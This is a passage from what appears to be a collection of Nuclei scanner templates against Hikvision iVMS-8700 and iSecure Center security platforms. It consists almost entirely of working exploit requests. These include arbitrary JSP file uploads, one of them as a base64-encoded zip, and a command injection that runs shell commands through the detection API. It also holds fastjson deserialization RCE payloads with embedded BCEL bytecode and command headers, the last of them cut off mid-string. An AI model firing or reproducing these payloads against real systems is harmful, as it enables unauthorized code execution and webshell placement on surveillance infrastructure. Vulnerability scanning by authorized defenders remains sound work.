32 | Sec-Ch-Ua: "Chromium";v="122", "Not(A:Brand";v="24", "Google Chrome";v="122"
33 | Sec-Ch-Ua-Mobile: ?0
34 | Sec-Ch-Ua-Platform: "Windows"
35 | Upgrade-Insecure-Requests: 1
36 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
37 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
38 | Sec-Fetch-Site: none
39 | Sec-Fetch-Mode: navigate
40 | Sec-Fetch-User: ?1
41 | Sec-Fetch-Dest: document
42 | Accept-Encoding: gzip, deflate, br
43 | Accept-Language: zh-CN,zh;q=0.9
44 | Connection: keep-alive
45 |
46 | matchers:
47 | - type: dsl
48 | dsl:
49 | - "contains(body_2, 'testax') "
50 |
51 |
--------------------------------------------------------------------------------
/Hikvision/18海康威视iVMS-8700综合安防系统resourceOperations任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_18
2 |
3 | info:
4 | name: 海康威视iVMS-8700综合安防系统resourceOperations任意文件上传
5 | author: YanXi
6 | severity: high
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | variables:
13 | a1: "{{RootURL}}"
14 | a2: "{{a1}}/eps/api/resourceOperations/uploadsecretKeyIbuilding"
15 | a3: "{{md5('{{a2}}')}}"
16 | a4: "{{to_upper('{{a3}}')}}"
17 |
18 | flow: http(1) && http(2)
19 |
20 | http:
21 | - raw:
22 | - |-
23 | POST /eps/api/resourceOperations/upload?token={{a4}} HTTP/1.1
24 | Host: {{Hostname}}
25 | Accept-Language:zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
26 | Content-Type:multipart/form-data;boundary=----WebKitFormBoundaryGEJwjlojPo
27 | Cache-Control:max-age=0
28 | Connection:close
29 | Content-Length: 178
30 |
31 | ------WebKitFormBoundaryGEJwjlojPo
32 | Content-Disposition: form-data;name="fileUploader"; filename="test.jsp"
33 | Content-Type: image/jpeg
34 |
35 | hello
36 | ------WebKitFormBoundaryGEJwjlojPo--
37 |
38 | matchers:
39 | - type: word
40 | part: body
41 | words:
42 | - 'true'
43 | internal: true
44 |
45 | extractors:
46 | - type: regex
47 | name: resourceUuid
48 | part: body
49 | internal: true
50 | regex:
51 | - '([^"]{32})'
52 |
53 | - raw:
54 | - |+
55 | GET /eps/upload/{{resourceUuid}}.jsp HTTP/1.1
56 | Host: {{Hostname}}
57 | Cache-Control: max-age=0
58 | Upgrade-Insecure-Requests: 1
59 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
60 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
61 | Accept-Encoding: gzip, deflate, br
62 | Accept-Language: zh-CN,zh;q=0.9
63 | Connection: close
64 |
65 | matchers:
66 | - type: word
67 | part: body
68 | words:
69 | - 'hello'
--------------------------------------------------------------------------------
/Hikvision/17海康威视iVMS-8700综合安防管理平台 upload.action 任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_17
2 |
3 | info:
4 | name: 海康威视iVMS-8700综合安防系统resourceOperations任意文件上传
5 | author: YanXi
6 | severity: high
7 | description: description
8 | reference:
9 | - https://
10 | tags: Hikvision
11 |
12 | flow: http(1) && http(2)
13 |
14 | http:
15 | - raw:
16 | - |-
17 | POST /eps/resourceOperations/upload.action HTTP/1.1
18 | Host: {{Hostname}}
19 | Cache-Control: max-age=0
20 | Upgrade-Insecure-Requests: 1
21 | User-Agent: MicroMessenger
22 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
23 | Accept-Encoding: gzip, deflate
24 | Accept-Language: zh-CN,zh;q=0.9
25 | Cookie: ISMS_8700_Sessionname=CA0F207A6372FE883ACA78B74E6DC953; CAS-USERNAME=058; ISMS_8700_Sessionname=4D808BE7BE0E5C7047B9688E6009F710
26 | Connection: close
27 | Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTJyhtTNqdMNLZLhj
28 | Content-Length: 212
29 |
30 | ------WebKitFormBoundaryTJyhtTNqdMNLZLhj
31 | Content-Disposition: form-data; name="fileUploader";filename="test.jsp"
32 | Content-Type: image/jpeg
33 |
34 | <%out.print("hello");%>
35 | ------WebKitFormBoundaryTJyhtTNqdMNLZLhj--
36 |
37 | matchers:
38 | - type: word
39 | part: body
40 | words:
41 | - 'true'
42 | internal: true
43 |
44 | extractors:
45 | - type: regex
46 | name: resourceUuid
47 | part: body
48 | internal: true
49 | regex:
50 | - '([^"]{32})'
51 |
52 | - raw:
53 | - |+
54 | GET /eps/upload/{{resourceUuid}}.jsp HTTP/1.1
55 | Host: {{Hostname}}
56 | Cache-Control: max-age=0
57 | Upgrade-Insecure-Requests: 1
58 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
59 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
60 | Accept-Encoding: gzip, deflate, br
61 | Accept-Language: zh-CN,zh;q=0.9
62 | Connection: close
63 |
64 | matchers:
65 | - type: word
66 | part: body
67 | words:
68 | - 'hello'
69 |
--------------------------------------------------------------------------------
/Hikvision/35海康威视综合安防系统detection接口存在RCE漏洞.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_35
2 | info:
3 | name: 海康威视综合安防系统detection接口存在RCE漏洞
4 | author: YanXi
5 | severity: critical
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |+
13 | POST /center/api/installation/detection;.js HTTP/1.1
14 | Host: {{Hostname}}
15 | Cache-Control: max-age=0
16 | Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
17 | Sec-Ch-Ua-Mobile: ?0
18 | Sec-Ch-Ua-Platform: "macOS"
19 | Upgrade-Insecure-Requests: 1
20 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
21 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
22 | Sec-Fetch-Site: none
23 | Sec-Fetch-Mode: navigate
24 | Sec-Fetch-User: ?1
25 | Sec-Fetch-Dest: document
26 | Accept-Encoding: gzip, deflate
27 | Accept-Language: zh-CN,zh;q=0.9
28 | Connection: close
29 | Content-Type: application/json;charset=UTF-8
30 | Content-Length: 155
31 |
32 | {"type":"environment",
33 | "operate":"",
34 | "machines":{"id":"$(find /|grep chunk-common.34c924fe.js|while read f;do sh -c id >$(dirname $f)/123.js;done)"}}
35 |
36 | - |+
37 | GET /portal/ui/static/js/123.js HTTP/1.1
38 | Host: {{Hostname}}
39 | Cache-Control: max-age=0
40 | Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
41 | Sec-Ch-Ua-Mobile: ?0
42 | Sec-Ch-Ua-Platform: "macOS"
43 | Upgrade-Insecure-Requests: 1
44 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
45 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
46 | Sec-Fetch-Site: none
47 | Sec-Fetch-Mode: navigate
48 | Sec-Fetch-User: ?1
49 | Sec-Fetch-Dest: document
50 | Accept-Encoding: gzip, deflate
51 | Accept-Language: zh-CN,zh;q=0.9
52 | Connection: close
53 |
54 | matchers:
55 | - type: dsl
56 | dsl:
57 | - "contains(body_2, 'gid') && status_code != 403 "
--------------------------------------------------------------------------------
/Hikvision/16海康威视-ivms-8700-home-upload-getpic-任意文件上传.yaml:
--------------------------------------------------------------------------------
1 | id: hikvision-ivms8700-msp_home_upload_getpic-fileupload
2 |
3 | info:
4 | name: hikvision-ivms8700-msp_home_upload_getpic-fileupload
5 | author: hikvision-ivms8700-msp_home_upload_getpic-fileupload
6 | severity: critical
7 | tags: Hikvision
8 |
9 | variables:
10 | boundary: "{{rand_base(20)}}"
11 | filename: "{{rand_base(5)}}"
12 | filedata: "UEsDBBQAAAAAAHqmblcAAAAAAAAAAAAAAAALAAAAdGVzdDEvdGVzdC9QSwMEFAAAAAgABXjkVk0oP2r5AAAABBgAABQAAAB0ZXN0MS90ZXN0Ly5EU19TdG9yZe2YwUrDQBRF74wRArqYpct8gdA/iGUEl0LAtdZKXaRNKOo6f6b/4080mbmlLQ2h3bX0nizOhPcmeSQk8xgAZvw9HQGuHaaINu1gD8Z7Q5a+7iaHa3ygxBM87vGG86Cr/RbPbeVfWO7UX6MuZ6PivZrX6+Sh3Hnl/aSsJnxYfy//vw/D+dOj8uvPw2v5KZaLslrMwnsRQgghdjFc328ghBD7/4eMzukm2jBu6WRrjqMzOqeb4PaItnRCp7SjMzqnm2jD+1g6oVPa0RmdQwjRw1WU69b/x/AJCSEuDZP4wo8HNossG4HXcLZpBPqaABv3s+66sRoBIU6TFVBLAwQUAAAAAACSpm5XAAAAAAAAAAAAAAAAGAAAAHRlc3QxL3Rlc3QvUGV0cmVsSEQuYXBwL1BLAwQUAAAACADTpG5XpgvrG2QAAABqAAAAFAAAAHRlc3QxL3Rlc3QvY2VzaGkuanNwHchNCsJADAbQq7gpTFyEUqsgFZeuRU8Q9EMjYWacpu31+7N871KlwTkXjW4xtM35dNy3dXOoqYuYdj8ZhTXxTQ1BcjZ9iWuK/IE/IHYX/4aC/4De13uijAbfmoj4jUUI1FXXGVBLAwQUAAAAAAB0pm5XAAAAAAAAAAAAAAAABgAAAHRlc3QxL1BLAQI/ABQAAAAAAHqmblcAAAAAAAAAAAAAAAALACQAAAAAAAAAEAAIAAAAAAB0ZXN0MS90ZXN0LwoAIAAAAAAAAQAYAJzzr1X5FtoBAAAAAAAAAAAAAAAAAAAAAFBLAQI/ABQAAAAIAAV45FZNKD9q+QAAAAQYAAAUACQAAAAAAAAAgAAAACkAAAB0ZXN0MS90ZXN0Ly5EU19TdG9yZQoAIAAAAAAAAQAYAAC5GSxFrtkBAAAAAAAAAAAAAAAAAAAAAFBLAQI/ABQAAAAAAJKmblcAAAAAAAAAAAAAAAAYACQAAAAAAAAAMAAAAFQBAAB0ZXN0MS90ZXN0L1BldHJlbEhELmFwcC8KACAAAAAAAAEAGADQnSFw+RbaAQAAAAAAAAAAAAAAAAAAAABQSwECPwAUAAAACADTpG5XpgvrG2QAAABqAAAAFAAkAAAAAAAAACAACACKAQAAdGVzdDEvdGVzdC9jZXNoaS5qc3AKACAAAAAAAAEAGAD2qMt89xbaAQAAAAAAAAAAAAAAAAAAAABQSwECPwAUAAAAAAB0pm5XAAAAAAAAAAAAAAAABgAkAAAAAAAAABAAAAAgAgAAdGVzdDEvCgAgAAAAAAABABgAKnx7TvkW2gEAAAAAAAAAAAAAAAAAAAAAUEsFBgAAAAAFAAUA6wEAAEQCAAAAAA=="
13 |
14 | http:
15 | - raw:
16 | - |
17 | POST /msp/home/upload.action;getPic?&type=ios HTTP/1.1
18 | Accept-Encoding: gzip
19 | Content-Length: 640
20 | Host: {{Hostname}}
21 | Content-Type: multipart/form-data; boundary={{boundary}}
22 | User-Agent: MicroMessenger
23 | Connection: close
24 |
25 | --{{boundary}}
26 | Content-Disposition: form-data; name="type"
27 |
28 | ios
29 | --{{boundary}}
30 | Content-Disposition: form-data; name="file"; filename="{{filename}}.ipa"
31 | Content-Type: None
32 |
33 | {{base64_decode(filedata)}}
34 |
35 | --{{boundary}}--
36 | - |
37 | GET /msp/upload/ios/{{filename}}/test1/test/ceshi.jsp HTTP/1.1
38 | Host: {{Hostname}}
39 | User-Agent: MicroMessenger
40 |
41 | payloads:
42 | token1:
43 | - "{{RootURL}}/msp/api/../home/upload.actionsecretKeyIbuilding"
44 |
45 | matchers:
46 | - type: dsl
47 | dsl:
48 | - status_code_1 == 200 && contains(body_1,'true') && contains(body_2,'1728481950')
49 |
--------------------------------------------------------------------------------
/Hikvision/12海康威视iSecure Center 综合安防管理平台ssoServicekeepalive远程代码执行.yaml:
--------------------------------------------------------------------------------
1 | id: Hikvision_12
2 | info:
3 | name: 海康威视iSecure Center 综合安防管理平台ssoService远程代码执行
4 | author: YanXi
5 | severity: critical
6 | description: description
7 | reference:
8 | - https://
9 | tags: Hikvision
10 | http:
11 | - raw:
12 | - |-
13 | POST /bic/ssoService/v1/keepAlive HTTP/1.1
14 | Host: {{Hostname}}
15 | Accept-Encoding: gzip, deflate
16 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
17 | Connection: close
18 | Content-Type: application/json
19 | Testcmd: whoami
20 | Content-Length: 5727
21 |
22 | {"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1$7e$3c$e0$d8$x$9f$d6mt$ba$86$9e$i$3d$bd$f5$e3$e0$8e$d1$86$c3$cd$b4$fa$i$o$89$d0T$84$8b$b1r$a3$f4$91$e8$r$ea$8b$B$d7$E$dc$3d$e1$i$3c$dd$e1$80$d7w$S$be$b8$3b$c0$c7$e2$9e$87$m$c4$e2$5e$b6$e6$e0o$f4$9e$84$Yw7$Q$dd$d9$9d$40I$dc$3d$O$89$Il$dbp$8a$ed$89$b3tG$7d$O$b3$Ce$k$5bQ$98$u$e5$f5$k$5b$a2$d1$be$cd$e2P$b3$t$Q$b0m$G$w$3d$93$e6$c8D$d8$937Al$ddWS$d2$fe$ff$x9F$99$A$M$faN$ae$b0$9f$e3$98M$U$96$af$b5$u$a3$b5$83$f2$b6$89$b2$b4$99h$9dt$bf$9d8o$82$85$z8$80$$$dcG$rx$98h$e3$94$fe$e3T$80$d3$94$d5$a7$89$f3$F$f4$d2$_0$H$ee$e7a$f2x$d5$f3$d8$c8$e3$96$L$d8$c0c$H$8f$5b$R$cfW$ad$8e$caA$l$TN9$f0$A$dcv9Vr$b6$d7$U$96$f8$m$aa$c3$N9TugQ$da$ec$a1$C$cd$e9$c9$5ez$ae$f11H$tP$jo$YG$cd$e9FO$O$c1F$S$98$7b$944$96$a2$92$be$e4$ab$f3A$y$87D$eb$O$3a$dd$K$9e$y$95b$X$dd$dfF$f7$afF$Nn$t$ac$dc$81EPP$8b$E$c2$Y$m$feA$db$f1$Kx$$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}
23 | }
24 | matchers:
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Hikvision/10海康威视-综合安防管理平台-applyautologinticket-反序列化.yaml:
--------------------------------------------------------------------------------
1 | id: hikvision-zongheanfang-fastjson-applyAutoLoginTicket
2 |
3 | info:
4 | name: hikvision-zongheanfang-fastjson-applyAutoLoginTicket
5 | author: hikvision-zongheanfang-fastjson-applyAutoLoginTicket
6 | severity: critical
7 |
8 |
9 | requests:
10 | - raw:
11 | - |
12 | POST /bic/ssoService/v1/applyAutoLoginTicket HTTP/1.1
13 | Host: {{Hostname}}
14 | Accept-Encoding: gzip, deflate
15 | Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
16 | Connection: close
17 | Content-Type: application/json
18 | Testcmd: echo {{randstr}}
19 | Content-Length: 5729
20 |
21 | {"CTGT":{ "a": {"@type": "java.lang.Class","val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"},"b": {"@type": "java.lang.Class","val": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$